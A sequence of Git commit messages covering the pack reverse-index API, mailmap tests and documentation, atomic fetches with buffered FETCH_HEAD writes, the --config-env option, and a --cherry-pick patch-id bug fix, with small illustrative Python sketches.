Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove another instance of looking at the revindex directly by instead
calling 'pack_pos_to_index()'. Unlike other patches, this caller only
cares about the index position of each object in the loop.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove another instance of direct revindex manipulation by calling
'pack_pos_to_offset()' instead (the caller here does not care about the
index position of the object at position 'pos').
Note that we cannot just use the existing "offset" variable to store the
value we get from pack_pos_to_offset(). It is incremented by
unpack_object_header(), but we later need the original value. Since
we'll no longer have revindex->offset to read it from, we'll store that
in a separate variable ("header" since it points to the entry's header
bytes).
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove another caller that holds onto a 'struct revindex_entry' by
replacing the direct indexing with calls to 'pack_pos_to_offset()' and
'pack_pos_to_index()'.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Avoid storing the revindex entry directly, since this structure will
soon be removed from the public interface. Instead, store the offset and
index position by calling 'pack_pos_to_offset()' and
'pack_pos_to_index()', respectively.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Replace find_revindex_position() with its counterpart in the new API,
offset_to_pack_pos().
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Replace direct accesses to the revindex with calls to
'offset_to_pack_pos()' and 'pack_pos_to_index()'.
Since this caller already had some error checking (it can jump to the
'give_up' label if it encounters an error), we can easily check whether
or not the provided offset points to an object in the given pack. This
error checking existed prior to this patch, too, since the caller checks
whether the return value from 'find_pack_revindex()' was NULL or not.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Replace a direct access to the revindex array with
'pack_pos_to_offset()'.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Replace direct revindex accesses with calls to 'pack_pos_to_offset()'
and 'pack_pos_to_index()'.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
First replace 'find_pack_revindex()' with its replacement
'offset_to_pack_pos()'. This prevents any bogus OFS_DELTA that may make
its way through until 'write_reuse_object()' from causing a bad memory
read (if 'revidx' is 'NULL').
Next, replace a direct access of '->nr' with the wrapper function
'pack_pos_to_index()'.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the next several patches, we will prepare for loading a reverse index
either in memory (mapping the inverse of the .idx's contents in-core),
or directly from a yet-to-be-introduced on-disk format. To prepare for
that, we'll introduce an API that avoids the caller explicitly indexing
the revindex pointer in the packed_git structure.
There are four ways to interact with the reverse index. Accordingly,
four functions will be exported from 'pack-revindex.h' by the time that
the existing API is removed. A caller may:
1. Load the pack's reverse index. This involves opening up the index,
generating an array, and then sorting it. Since opening the index
can fail, this function ('load_pack_revindex()') returns an int.
Accordingly, it takes only a single argument: the 'struct
packed_git' the caller wants to build a reverse index for.
This function is well-suited for both the current and new API.
Callers will have to continue to open the reverse index explicitly,
but this function will eventually learn how to detect and load a
reverse index from the on-disk format, if one exists. Otherwise, it
will fall back to generating one in memory from scratch.
2. Convert a pack position into an offset. This operation is now
called `pack_pos_to_offset()`. It takes a pack and a position, and
returns the corresponding off_t.
Any error simply calls BUG(), since the callers are not well-suited
to handle a failure and keep going.
3. Convert a pack position into an index position. Same as above; this
takes a pack and a position, and returns a uint32_t. This operation
is known as `pack_pos_to_index()`. The same thinking about error
conditions applies here as well.
4. Find the pack position for a given offset. This operation is now
known as `offset_to_pack_pos()`. It takes a pack, an offset, and a
pointer to a uint32_t where the position is written, if an object
exists at that offset. Otherwise, -1 is returned to indicate
failure.
Unlike some of the callers that used to access '->offset' and '->nr'
directly, the error checking around this call is somewhat more
robust. This is important since callers should always pass an offset
which points at the boundary of two objects. The API, unlike direct
access, enforces that that is the case.
This will become important in a subsequent patch where a caller
which does not but could check the return value treats the signed
`-1` from `find_revindex_position()` as an index into the 'revindex'
array.
Two design warts are carried over into the new API:
- Asking for the index position of an out-of-bounds object will result
in a BUG() (since no such object exists), but asking for the offset
of the non-existent object at the end of the pack returns the total
size of the pack.
This makes it convenient for callers who always want to take the
difference of two adjacent objects' offsets (to compute the on-disk
size) but don't want to worry about boundaries at the end of the
pack.
- offset_to_pack_pos() lazily loads the reverse index, but
pack_pos_to_index() doesn't (callers of the former are well-suited
to handle errors, but callers of the latter are not).
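To make the shape of this API concrete, here is a toy Python model of the three lookups. It is a sketch under stated assumptions, not the C code: the class name is hypothetical, `pack_end` stands for the value reported for the position just past the last object, a failed lookup returns None instead of -1 with an out-parameter, and BUG() is modelled with an AssertionError.

```python
import bisect


class ReverseIndexModel:
    """Toy model of a reverse index: pack order -> offset and .idx position."""

    def __init__(self, idx_offsets, pack_end):
        # idx_offsets[i] is the pack offset of the object at .idx position i.
        self.num_objects = len(idx_offsets)
        # Sorting the .idx positions by offset yields pack order.
        self._index_pos = sorted(range(self.num_objects), key=idx_offsets.__getitem__)
        # One extra slot past the last object holds the end-of-pack offset.
        self._offsets = [idx_offsets[i] for i in self._index_pos] + [pack_end]

    def pack_pos_to_offset(self, pos):
        if not 0 <= pos <= self.num_objects:
            raise AssertionError("BUG: pack position out of bounds")
        return self._offsets[pos]

    def pack_pos_to_index(self, pos):
        if not 0 <= pos < self.num_objects:
            raise AssertionError("BUG: pack position out of bounds")
        return self._index_pos[pos]

    def offset_to_pack_pos(self, offset):
        """Return the position of the object starting at `offset`, or None."""
        pos = bisect.bisect_left(self._offsets, offset, 0, self.num_objects)
        if pos < self.num_objects and self._offsets[pos] == offset:
            return pos
        return None


rev = ReverseIndexModel([150, 12, 80], pack_end=200)
last = rev.offset_to_pack_pos(150)
# On-disk size of the last object: difference of two adjacent offsets.
size = rev.pack_pos_to_offset(last + 1) - rev.pack_pos_to_offset(last)
print(last, rev.pack_pos_to_index(last), size)
```

The extra slot is what lets the size computation work for the last object without a special case, while asking for the index position of that slot is still treated as a bug.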
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Let's replace the 2 different pieces of code that write a
promisor file in 'builtin/repack.c' and 'fetch-pack.c'
with a new function called 'write_promisor_file()' in
'pack-write.c' and 'pack.h'.
This might also help us in the future, if we want to put
back the ref names and associated hashes that were in
the promisor files we are repacking in 'builtin/repack.c'
as suggested by a NEEDSWORK comment just above the code
we are refactoring.
Signed-off-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As we are going to refactor the code that actually writes
the promisor file into a separate function in a following
commit, let's rename the current write_promisor_file()
function to create_promisor_file().
Signed-off-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove support for the magical "repo-abbrev" comment in .mailmap
files. This was added to .mailmap parsing in [1], as a generalized
feature of the git-shortlog Perl script added earlier in [2].
There was no documentation or tests for this feature, and I don't
think it's used in practice anymore.
What it did was to allow you to specify a single string to be
search-replaced with "/.../" in the .mailmap file. E.g. for
linux.git's current .mailmap:
git archive --remote=git@gitlab.com:linux-kernel/linux.git \
HEAD -- .mailmap | grep -a repo-abbrev
# repo-abbrev: /pub/scm/linux/kernel/git/
Then when running e.g.:
git shortlog --merges --author=Linus -1 v5.10-rc7..v5.10 | grep Merge
We'd emit (the [...] is mine):
Merge tag [...]git://git.kernel.org/.../tip/tip
But will now emit:
Merge tag [...]git.kernel.org/pub/scm/linux/kernel/git/tip/tip
I think at this point this is just a historical artifact we can get
rid of. It was initially meant for Linus's own use when we integrated
the Perl script[2], but since then it seems he's stopped using it.
Digging through Linus's release announcements on the LKML[3] the last
release I can find that made use of this output is Linux 2.6.25-rc6
back in March 2008[4]. Later on Linus started using --no-merges[5],
and nowadays seems to prefer some custom not-quite-shortlog format of
merges from lieutenants[6].
You will still see it on linux.git if you run "git shortlog" manually
yourself with --merges. With this removed, you can still get the same
output with:
git log --pretty=fuller v5.10-rc7..v5.10 |
sed 's!/pub/scm/linux/kernel/git/!/.../!g' |
git shortlog
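The substitution itself is tiny. As a sketch, the same search-replace as the sed expression above could be written in Python like this; `abbreviate_repo()` is a hypothetical name, and the URL is the one from the example output earlier in this message.

```python
def abbreviate_repo(line, prefix):
    """Replace every occurrence of the common repository prefix with "/.../"."""
    return line.replace(prefix, "/.../")


prefix = "/pub/scm/linux/kernel/git/"
full = "git://git.kernel.org/pub/scm/linux/kernel/git/tip/tip"
print(abbreviate_repo(full, prefix))
```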
Arguably we should do the same for the search-replacing of "[PATCH]"
at the beginning with "". That seems to be another relic of a bygone
era when linux.git patches would have their E-Mail subject lines
applied as-is by "git am" or whatever. But we documented that feature
in "git-shortlog(1)", and it seems more widely applicable than
something purely kernel-specific.
1. 7595e2ee6e (git-shortlog: make common repository prefix
configurable with .mailmap, 2006-11-25)
2. fa375c7f1b (Add git-shortlog perl script, 2005-06-04)
3. https://lore.kernel.org/lkml/
4. https://lore.kernel.org/lkml/alpine.LFD.1.00.0803161651350.3020@woody.linux-foundation.org/
5. https://lore.kernel.org/lkml/BANLkTinrbh7Xi27an3uY7pDWrNKhJRYmEA@mail.gmail.com/
6. https://lore.kernel.org/lkml/CAHk-=wg1+kf1AVzXA-RQX0zjM6t9J2Kay9xyuNqcFHWV-y5ZYw@mail.gmail.com/
Acked-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add documentation and more tests for case-insensitivity. The existing
test only matched on the E-Mail part, but as shown here we also match
the name with strcasecmp().
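A simplified Python model of such a case-insensitive lookup is sketched below. It uses lower() as a stand-in for strcasecmp(), the helper names are hypothetical, the addresses are made up, and real mailmap parsing and precedence rules are richer than this.

```python
def make_mailmap(entries):
    """entries: (proper_name, proper_email, old_name_or_None, old_email)."""
    table = {}
    for proper_name, proper_email, old_name, old_email in entries:
        key = (old_name.lower() if old_name else None, old_email.lower())
        table[key] = (proper_name, proper_email)
    return table


def map_user(table, name, email):
    """Look up name+email first, then email alone, ignoring case in both."""
    for key in ((name.lower(), email.lower()), (None, email.lower())):
        if key in table:
            proper_name, proper_email = table[key]
            return (proper_name or name, proper_email or email)
    return (name, email)


table = make_mailmap([("Jane Doe", "jane@example.com", "JD", "jane@laptop.example")])
print(map_user(table, "jd", "JANE@LAPTOP.EXAMPLE"))
```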
This behavior was last discussed on the mailing list in the thread
starting at [1]. It seems we're keeping it like this, so let's
document it.
1. https://lore.kernel.org/git/87czykvg19.fsf@evledraar.gmail.com/
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add tests for mailmap's handling of "<>", which is allowed on the RHS,
but not the LHS of a "<LHS> <RHS>" pair.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add tests for mailmap's handling of whitespace, i.e. how it trims
space within "<>" and around author names.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the mailmap documentation added in 0925ce4d49 (Add map_user()
and clear_mailmap() to mailmap, 2009-02-08) to continue discussing the
Jane/Joe example. I think this makes things a lot less confusing as
we're building up more complex examples using one set of data which
covers all the things we'd like to discuss.
Also add tests to assert that what our documentation says is what's
actually happening. This is mostly (or entirely) covered by existing
tests which I'm not deleting, but having these tests for the synopsis
makes it easier to follow along while reading the tests & docs.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Refactor a few more tests to use the new "--append" option to
"test_commit". I added it for use in the mailmap tests, but this
demonstrates how useful it is in general.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add an --append option to test_commit to append <contents> to the
<file> we're writing to. This simplifies a lot of test setup, as shown
in some of the tests being changed here.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add support for --author to "test_commit". This will simplify some
current and future tests; one of those is being changed here.
Let's also line-wrap the "git commit" command invocation so that diffs
adding subsequent options are easier to read, as they'll only need to
add a new option line.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The --notick argument was added in [1] and was followed by --signoff
in [2], but neither of these commits added any documentation for these
options. When -C was added in [3] a comment was added to document it,
but not the other options. Let's document all of these options.
1. 44b85e89d7 (t7003: add test to filter a branch with a commit at
epoch, 2012-07-12),
2. 5ed75e2a3f (cherry-pick: don't forget -s on failure, 2012-09-14).
3. 6f94351b0a (test-lib-functions.sh: teach test_commit -C <dir>,
2016-12-08)
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Expand the comment template for "test_commit" to match that of
"test_commit_bulk" added in b1c36cb849 (test-lib: introduce
test_commit_bulk, 2019-07-02). It has several undocumented options,
which won't all fit on one line. Follow-up commit(s) will document
them.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
That we silently ignore missing mailmap.file or mailmap.blob values is
intentional. See 938a60d64f (mailmap: clean up read_mailmap error
handling, 2012-12-12). However, nothing tested for this. Let's do that
by checking that stderr is empty in those cases.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change a test that used a custom fuzzing function since
bfdfa3d414 (t4203 (mailmap): stop hardcoding commit ids and dates,
2010-10-15) to just use the "blame --porcelain" output instead.
We could use the same pattern as 0ba9c9a0fb (t8008: rely on
rev-parse'd HEAD instead of sha1 value, 2017-07-26) does to do this,
but there wouldn't be any point. We're not trying to test "blame"
output here in general, just that "blame" pays attention to the
mailmap.
So it's sufficient to get the blamed line(s) and authors from the
output, which is much easier with the "--porcelain" option.
It would still be possible for there to be a bug in "blame" such that
it uses the mailmap for its "--porcelain" output, but not the regular
output. Let's test for that simply by checking if specifying the
mailmap changes the output.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a test for one of the error conditions added in
938a60d64f (mailmap: clean up read_mailmap error handling,
2012-12-12).
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Remove a redundant line in a test added in d20d654fe8 (Change current
mailmap usage to do matching on both name and email of
author/committer., 2009-02-08).
This didn't conceivably test anything useful and is most likely a
copy/paste error.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The --stdin tests set up the "contact" file in the main setup; let's
instead set it up in the test that uses it.
Also refactor the first test so it's obvious that the point of it is
that "check-mailmap" will spew its input as-is when given no
argument. For that one we can just use the "expect" file as-is.
Also add tests for how other "--stdin" cases are handled, e.g. one
where we actually do a mapping.
For the rest of --stdin testing we just assume we're going to get the
same output. We could follow-up and make sure everything's
round-tripped through both --stdin and the file/blob backends, but I
don't think there's much point in that.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Refactor the mailmap tests to:
* Set up "actual" test files in the body of "test_expect_success".
* Not have X of "test_expect_success X Y" be an unquoted string.
* Not carry over test config between tests, and instead use
"test_config".
* Replace various "echo" a line-at-a-time patterns with here-docs.
* Change a case of "log.mailmap=False" to use the lower-case
"false". Both work, but this ends up in git-config's boolean
parsing and these atypical values are tested for elsewhere. Let's
use the lower-case to not draw the reader's attention to this
abnormality.
* Remove commentary asserting that things work a given way in favor
of simply testing for it, i.e. in the case of a .mailmap file
outside of the repository.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change these tests to use the preferred whitespace around ">",
"<<-EOF" etc. This is an initial step in larger and more meaningful
refactoring of the file, which makes a subsequent commit easier to
read.
I'm not changing the whitespace of "echo <str> > file" patterns to
"echo <str> >file" because all of those will be changed to here-docs
in a subsequent commit.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Mentioning the comment syntax and blank line support first is in line
with how "git help config" describes its format. See
b8936cf060 (config.txt grammar, typo, and asciidoc fixes, 2006-06-08)
for the paragraph I'm copying & amending from its documentation.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a passing mention of the mailmap.file and mailmap.blob
configuration options. Before this addition a reader of the
"check-mailmap" manpage would have no idea that a custom map could be
specified, unless they'd happen to e.g. come across it in the "config"
manpage first.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Quote the mailmap.file and mailmap.blob configuration variables as
`mailmap.file` and `mailmap.blob`, and link to git-config(1). This is
in line with the preferred way of doing this in the rest of our
documentation.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Create a gitmailmap(5) page similar to how .gitmodules and .gitignore
have their own pages at gitmodules(5) and gitignore(5). Now instead of
"check-mailmap", "blame" and "shortlog" documentation including the
description of the format we link to one canonical place.
This makes things easier for readers, since in our manpage or
web-based[1] output it's not clear that the "MAPPING AUTHORS" sections
aren't subtly different, as opposed to just included.
1. https://git-scm.com/docs/git-check-mailmap
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When executing a fetch, git currently allocates one reference
transaction per reference update and commits it directly. This means that
fetches are non-atomic: even if some of the reference updates fail,
others may still succeed and modify local references.
This is fine in many scenarios, but this strategy has its downsides.
- The view of remote references may be inconsistent and may show a
bastardized state of the remote repository.
- Batching together updates may improve performance in certain
scenarios. While the impact probably isn't as pronounced with loose
references, the upcoming reftable backend may benefit as it needs to
write fewer files in case the update is batched.
- The reference-transaction hook is currently being executed twice per
updated reference. While this doesn't matter when there is no such
hook, we have seen severe performance regressions when doing a
git-fetch(1) with a reference-transaction hook when the remote
repository has hundreds of thousands of references.
Similar to `git push --atomic`, this commit thus introduces atomic
fetches. Instead of allocating one reference transaction per updated
reference, it causes us to only allocate a single transaction and commit
it as soon as all updates were received. If locking of any reference
fails, then we abort the complete transaction and don't update any
reference, which gives us an all-or-nothing fetch.
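The difference between the two strategies can be sketched as follows.
This is a minimal Python model, not Git's C implementation: the
function names, the dict standing in for the ref store and the
"locked" set that simulates lock failures are all assumptions made
for illustration.

```python
class LockError(Exception):
    """Raised when a (simulated) reference cannot be locked."""


def fetch_non_atomic(refs, updates, locked):
    """One transaction per reference: earlier updates survive later failures."""
    failed = []
    for name, oid in updates:
        if name in locked:
            failed.append(name)  # this update fails, the others go on
            continue
        refs[name] = oid  # committed immediately
    return failed


def fetch_atomic(refs, updates, locked):
    """Single transaction: queue everything, commit only if all locks succeed."""
    queued = {}
    for name, oid in updates:
        if name in locked:
            raise LockError(name)  # abort: nothing has been written yet
        queued[name] = oid
    refs.update(queued)  # commit all queued updates together
```

With one locked reference, fetch_non_atomic() leaves the ref store
partially updated, while fetch_atomic() raises and leaves it untouched.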
Note that this may not completely fix the first of the above downsides, as
the consistent view also depends on the server-side. If the server
doesn't have a consistent view of its own references during the
reference negotiation phase, then the client would get the same
inconsistent view the server has. This is a separate problem though and,
if it actually exists, can be fixed at a later point.
This commit also changes the way we write FETCH_HEAD in case `--atomic`
is passed. Instead of writing changes as we go, we need to accumulate
all changes first and only commit them at the end when we know that all
reference updates succeeded. Ideally, we'd just do so via a temporary
file so that we don't need to carry all updates in-memory. This isn't
trivially doable though considering the `--append` mode, where we do not
truncate the file but simply append to it. And given that we support
concurrent processes appending to FETCH_HEAD at the same time without
any loss of data, seeding the temporary file with current contents of
FETCH_HEAD initially and then doing a rename wouldn't work either. So
this commit implements the simple strategy of buffering all changes and
appending them to the file on commit.
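A rough Python sketch of that buffering strategy is shown below. The
class and method names are hypothetical and do not mirror the C code;
the point is only that in atomic mode nothing reaches the file until
commit() is called, and that the file is opened in append mode so
that existing contents are never truncated.

```python
import os
import tempfile


class FetchHead:
    """Toy model of FETCH_HEAD writes with optional buffering."""

    def __init__(self, path, atomic):
        self.path = path
        self.atomic = atomic
        self.buffer = []  # pending lines, only used in atomic mode

    def append(self, line):
        if self.atomic:
            self.buffer.append(line)  # hold back until commit()
        else:
            with open(self.path, "a") as f:
                f.write(line)  # written as we go

    def commit(self):
        # Append (never truncate), so other content in the file is kept.
        if self.atomic and self.buffer:
            with open(self.path, "a") as f:
                f.write("".join(self.buffer))
            self.buffer.clear()
```

If any reference update fails, the caller simply never calls commit()
and the buffered lines are dropped.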
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The handling of ref updates is completely handled by `s_update_ref()`,
which will manage the complete lifecycle of the reference transaction.
This is fine right now given that git-fetch(1) does not support atomic
fetches, so each reference gets its own transaction. It is quite
inflexible though, as `s_update_ref()` only knows about a single
reference update at a time, so it doesn't allow us to alter the
strategy.
This commit prepares `s_update_ref()` and its only caller
`update_local_ref()` to allow passing an external transaction. If none
is given, then the existing behaviour is triggered which creates a new
transaction and directly commits it. Otherwise, if the caller provides a
transaction, then we only queue the update but don't commit it. This
optionally allows the caller to manage when a transaction will be
committed.
Given that `update_local_ref()` is always called with a `NULL`
transaction for now, no change in behaviour is expected from this
change.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The cleanup code in `s_update_ref()` is currently duplicated for both
successful and erroneous exit paths. This commit refactors the function
to have a shared exit path for both cases to remove the duplication.
Suggested-by: Christian Couder <christian.couder@gmail.com>
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This commit refactors `append_fetch_head()` to use a `struct strbuf` for
formatting the update which we're about to append to the FETCH_HEAD
file. While the refactoring doesn't have much of a benefit right now, it
serves as a preparatory step to implement atomic fetches where we need
to buffer all updates to FETCH_HEAD and only flush them out if all
reference updates succeeded.
No change in behaviour is expected from this commit.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When performing a fetch with the default `--write-fetch-head` option, we
write all updated references to FETCH_HEAD while the updates are
performed. Given that updates are not performed atomically, it means
that we write to FETCH_HEAD even if some or all of the reference
updates fail.
Given that we simply update FETCH_HEAD ad-hoc with each reference, the
logic is completely contained in `store_update_refs` and thus quite hard
to extend. This can already be seen by the way we skip writing to the
FETCH_HEAD: instead of having a conditional which simply skips writing,
we instead open "/dev/null" and needlessly write all updates there.
We are about to extend git-fetch(1) to accept an `--atomic` flag which
will make the fetch an all-or-nothing operation with regards to the
reference updates. This will also require us to make the updates to
FETCH_HEAD an all-or-nothing operation, but as explained doing so is not
easy with the current layout. This commit thus refactors the way we write
to FETCH_HEAD and pulls out the logic to open, append to, commit and
close the file. While this may seem rather over the top at first,
pulling out this logic will make it a lot easier to update the code in a
subsequent commit. It also allows us to easily skip writing completely
in case `--no-write-fetch-head` was passed.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The function `git_config_parse_parameter` is responsible for parsing a
`foo.bar=baz`-formatted configuration key, sanitizing the key and then
processing it via the given callback function. Given that we're about to
add a second user which is going to process entries whose keys and
values are already separated, this commit extracts a function
`config_parse_pair` which only does the sanitization and processing
part as a preparatory step.
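The shape of the split can be illustrated with a small Python model.
The function names follow the text, but the bodies are assumptions:
the key sanitization here only lowercases the section and variable
name, which is a simplification of what Git actually does, and a
missing "=" is passed on as None.

```python
def config_parse_pair(key, value, callback):
    """Sanitize an already-split key and hand the pair to the callback."""
    parts = key.split(".")
    if len(parts) < 2 or not parts[0] or not parts[-1]:
        raise ValueError(f"key does not contain a section and name: {key!r}")
    # Simplified canonicalization: section and variable name are
    # lowercased, anything in between (a subsection) is kept as-is.
    parts[0] = parts[0].lower()
    parts[-1] = parts[-1].lower()
    return callback(".".join(parts), value)


def config_parse_parameter(text, callback):
    """Split 'foo.bar=baz' and delegate the rest to config_parse_pair()."""
    key, sep, value = text.partition("=")
    return config_parse_pair(key.strip(), value if sep else None, callback)
```

A second caller that already has the key and value in separate
variables can then call config_parse_pair() directly.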
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We provide a function for dequoting an entire string, as well as one for
handling a space-separated list of quoted strings. But there's no way
for a caller to parse a string like 'foo'='bar', even though it is easy
to generate one using sq_quote_buf() or similar.
Let's make the single-step function available to callers outside of
quote.c. Note that we do need to adjust its implementation slightly: it
insists on seeing whitespace between items, and we'd like to be more
flexible than that. Since it only has a single caller, we can move that
check (and slurping up any extra whitespace) into that caller.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
While it's already possible to pass runtime configuration via `git -c
<key>=<value>`, it may be undesirable to use when the value contains
sensitive information. E.g. if one wants to set `http.extraHeader` to
contain an authentication token, doing so via `-c` would trivially leak
those credentials via e.g. ps(1), which typically also shows command
arguments.
To enable this usecase without leaking credentials, this commit
introduces a new switch `--config-env=<key>=<envvar>`. Instead of
directly passing a value for the given key, it instead allows the user
to specify the name of an environment variable. The value of that
variable will then be used as value of the key.
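The lookup can be modelled roughly like this in Python. The function
name and the error messages are made up for this sketch, and
splitting at the last "=" is an assumption made here so that keys
containing "=" in a subsection would still work.

```python
import os


def resolve_config_env(spec, environ=None):
    """Turn '<key>=<envvar>' into (key, value read from the environment)."""
    environ = os.environ if environ is None else environ
    key, sep, envvar = spec.rpartition("=")
    if not sep or not key or not envvar:
        raise ValueError(f"invalid config format: {spec}")
    if envvar not in environ:
        raise KeyError(f"missing environment variable {envvar!r} for {key!r}")
    # Only the variable *name* appeared on the command line; the
    # secret itself is read from the environment here.
    return key, environ[envvar]
```

For example, with TOKEN set in the environment,
resolve_config_env("http.extraHeader=TOKEN") yields the key together
with the token, without the token ever appearing in the argument list.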
Co-authored-by: Jeff King <peff@peff.net>
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This fixes a bug introduced in dfb7a1b4d0 (patch-ids: stop using a
hand-rolled hashmap implementation, 2016-07-29) in which
git rev-list --cherry-pick A...B
will fail to suppress commits reachable from A even if a commit with
matching patch-id appears in B.
Around the time of that commit, the algorithm for "--cherry-pick" looked
something like this:
0. Traverse all of the commits, marking them as being on the left or
right side of the symmetric difference.
1. Iterate over the left-hand commits, inserting a patch-id struct for
each into a hashmap, and pointing commit->util to the patch-id
struct.
2. Iterate over the right-hand commits, checking which are present in
the hashmap. If so, we exclude the commit from the output _and_ we
mark the patch-id as "seen".
3. Iterate again over the left-hand commits, checking whether
commit->util->seen is set; if so, exclude them from the output.
At the end, we'll have eliminated commits from both sides that have a
matching patch-id on the other side. But there's a subtle assumption
here: for any given patch-id, we must have exactly one struct
representing it. If two commits from A both have the same patch-id and
we allow duplicates in the hashmap, then we run into a problem:
a. In step 1, we insert two patch-id structs into the hashmap.
b. In step 2, our lookups will find only one of these structs, so only
one "seen" flag is marked.
c. In step 3, one of the commits in A will have its commit->util->seen
set, but the other will not. We'll erroneously output the latter.
Prior to dfb7a1b4d0, our hashmap did not allow duplicates. Afterwards,
it used hashmap_add(), which explicitly does allow duplicates.
At that point, the solution would have been easy: when we are about to
add a duplicate, skip doing so and return the existing entry which
matches. But it gets more complicated.
In 683f17ec44 (patch-ids: replace the seen indicator with a commit
pointer, 2016-07-29), our step 3 goes away entirely. Instead, in step 2,
when the right-hand side finds a matching patch_id from the left-hand
side, we can directly mark the left-hand patch_id->commit to be omitted.
Solving that would be easy, too; there's a one-to-many relationship of
patch-ids to commits, so we just need to keep a list.
But there's more. Commit b3dfeebb92 (rebase: avoid computing unnecessary
patch IDs, 2016-07-29) built on that by lazily computing the full
patch-ids. So we don't even know when adding to the hashmap whether two
commits truly have the same id. We'd have to tentatively assign them a
list, and then possibly split them apart (possibly into N new structs)
at the moment we compute the real patch-ids. This could work, but it's
complicated and error-prone.
Instead, let's accept that we may store duplicates, and teach the lookup
side to be more clever. Rather than asking for a single matching
patch-id, it will need to iterate over all matching patch-ids. This does
mean examining every entry in a single hash bucket, but the worst-case
for a hash lookup was already doing that.
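A small Python model of the "store duplicates, iterate on lookup"
idea follows. It is only a sketch: commits and patch-ids are plain
strings, the dict of lists stands in for a hashmap that allows
duplicates, and the lazy patch-id computation is left out entirely.

```python
from collections import defaultdict


def cherry_pick_filter(left, right):
    """left/right: lists of (commit, patch_id); return the commits kept."""
    by_patch_id = defaultdict(list)  # duplicates are allowed
    for commit, patch_id in left:
        by_patch_id[patch_id].append(commit)

    omitted = set()
    for commit, patch_id in right:
        matches = by_patch_id.get(patch_id, [])
        if matches:
            omitted.add(commit)
            # Iterate over *all* left-hand entries with this patch-id,
            # not just the first one a single lookup would return.
            omitted.update(matches)

    keep_left = [c for c, _ in left if c not in omitted]
    keep_right = [c for c, _ in right if c not in omitted]
    return keep_left, keep_right
```

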